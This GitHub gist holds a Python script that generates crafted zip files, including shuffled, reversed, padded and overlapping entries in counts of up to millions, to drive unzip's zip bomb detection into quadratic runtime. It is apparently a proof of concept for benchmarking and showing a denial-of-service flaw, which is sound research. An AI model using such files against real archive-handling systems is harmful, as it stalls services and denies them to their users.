Skip to content

Instantly share code, notes, and snippets.

@maksverver
Last active April 20, 2025 16:47
Show Gist options
  • Save maksverver/c1d3ece843e613e1a6dde47300a87593 to your computer and use it in GitHub Desktop.
Save maksverver/c1d3ece843e613e1a6dde47300a87593 to your computer and use it in GitHub Desktop.
Python script to generate zip files which make the zip bomb detection logic in unzip run in quadratic time
#!/usr/bin/env python3
# Generates zip files that trigger quadratic runtime in unzip with zip bomb
# detection enabled.
import zlib
from random import shuffle, randrange
from struct import pack
def MakeBytes(data):
if isinstance(data, str):
data = data.encode('utf-8')
assert isinstance(data, bytes)
return data
def CreateFileHeaders(name, data, offset, extra=b'', comment=b''):
name = MakeBytes(name)
data = MakeBytes(data)
extra = MakeBytes(extra)
comment = MakeBytes(comment)
local_file_sig = 0x04034b50
central_directory_sig = 0x02014b50
gen_ver = min_ver = 10
flags = 0
comp = 0
mtime = 0
mdate = 0
crc32 = zlib.crc32(data)
csize = len(data)
usize = len(data)
name_len = len(name)
extra_len = len(extra)
comment_len = len(comment)
disk_no = 0
int_attr = 0
ext_attr = 0
local_file_header = pack('<IHHHHHIIIHH', local_file_sig, min_ver, flags, comp, mtime, mdate, crc32, csize, usize, name_len, extra_len) + name + extra
central_directory_file_header = pack('<IHHHHHHIIIHHHHHII', central_directory_sig, gen_ver, min_ver, flags, comp, mtime, mdate, crc32, csize, usize, name_len, extra_len, comment_len, disk_no, int_attr, ext_attr, offset) + name + extra + comment
return (local_file_header, central_directory_file_header)
def CreateEndOfCentralDirectoryRecord(entries, offset, comment=b''):
sig = 0x06054b50
current_disk = start_disk = 0
entries_on_disk = num_entries = min(len(entries), 65535)
total_size = sum(len(entry) for entry in entries)
comment = MakeBytes(comment)
comment_len = len(comment)
return pack('<IHHHHIIH', sig, current_disk, start_disk, entries_on_disk, num_entries, total_size, offset, comment_len) + comment
def CreateZip64EndOfCentralDirectoryRecord(entries, offset):
sig = 0x06064b50
gen_ver = min_ver = 45
current_disk = 0
start_disk = 0
record_size = 44
entries_on_disk = num_entries = len(entries)
total_size = sum(len(entry) for entry in entries)
return pack('<IQHHIIQQQQ', sig, record_size, gen_ver, min_ver, current_disk, start_disk, entries_on_disk, num_entries, total_size, offset)
def CreateZip64EndOfCentralDirectoryLocator(offset):
sig = 0x07064b50
disk_no = 0
disk_count = 1
return pack('<IIQI', sig, disk_no, offset, disk_count)
def GenerateTestCase(zip_filename, num_files, padding=None, transform=None, overlap=False):
with open(zip_filename, 'wb') as f:
entries = []
def AddFile(name, data, /, offset=None):
if offset is None: offset = f.tell()
data = MakeBytes(data)
local_header, central_header = CreateFileHeaders(name, data, offset)
entries.append(central_header)
f.write(local_header)
f.write(data)
def AddPadding(n):
f.write(bytes(n))
for i in range(num_files):
AddFile(f'{i}', '')
if padding: f.write(padding)
# This is important to trigger the worst case complexity.
if transform:
transform(entries)
if overlap:
# Make zip file invalid by adding an entry at the wrong offset.
# This should trigger zip bomb detection:
AddFile('x', '', offset=randrange(0, f.tell()))
# Write central directory followed by end-of-central-directory record.
central_directory_offset = f.tell()
central_directory = b''.join(entries)
f.write(central_directory)
if len(entries) >= 65535:
# Generate zip64 headers
zip64_eocdr_offset = f.tell()
f.write(CreateZip64EndOfCentralDirectoryRecord(entries, offset=central_directory_offset))
f.write(CreateZip64EndOfCentralDirectoryLocator(offset=zip64_eocdr_offset))
f.write(CreateEndOfCentralDirectoryRecord(entries, offset=central_directory_offset))
if __name__ == '__main__':
reverse = list.reverse
# Normal zip file with no padding between files. This doesn't
# trigger quadratic runtime because adjacent spans get merged.
GenerateTestCase('many-files-64k.zip', 65534)
# Invalid zip file where file entries overlap:
GenerateTestCase('many-files-64k-overlap.zip', 65534, overlap=True)
# Zip file with no padding between files, but with shuffled entries,
# which triggers quadratic runtime.
GenerateTestCase('many-files-64k-shuffled.zip', 65534, transform=shuffle)
# Zip file with padding between files. This uses linear memory, but doesn't
# trigger quadratic runtime because new entries are added at the end of the
# buffer which uses exponential resizing.
GenerateTestCase('many-files-64k-padded.zip', 65534, padding=bytes(1))
# Zip file with padding between files and entries in reverse, which triggers
# worst-case behavior.
GenerateTestCase('many-files-64k-padded-reversed.zip', 65534, padding=bytes(1), transform=reverse)
# Same as above, but with 1 million entries.
GenerateTestCase('many-files-1m-padded-shuffled.zip', 10**6, padding=bytes(1), transform=shuffle)
# Same as above, but with overlap, which should trigger zip bomb detection.
GenerateTestCase('many-files-1m-padded-shuffled-overlap.zip', 10**6, padding=bytes(1), transform=shuffle, overlap=True)
# Some larger cases for benchmarking:
GenerateTestCase('many-files-1m-padded-reversed.zip', 1 * 10**6, padding=bytes(1), transform=reverse)
GenerateTestCase('many-files-2m-padded-reversed.zip', 2 * 10**6, padding=bytes(1), transform=reverse)
GenerateTestCase('many-files-3m-padded-reversed.zip', 3 * 10**6, padding=bytes(1), transform=reverse)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment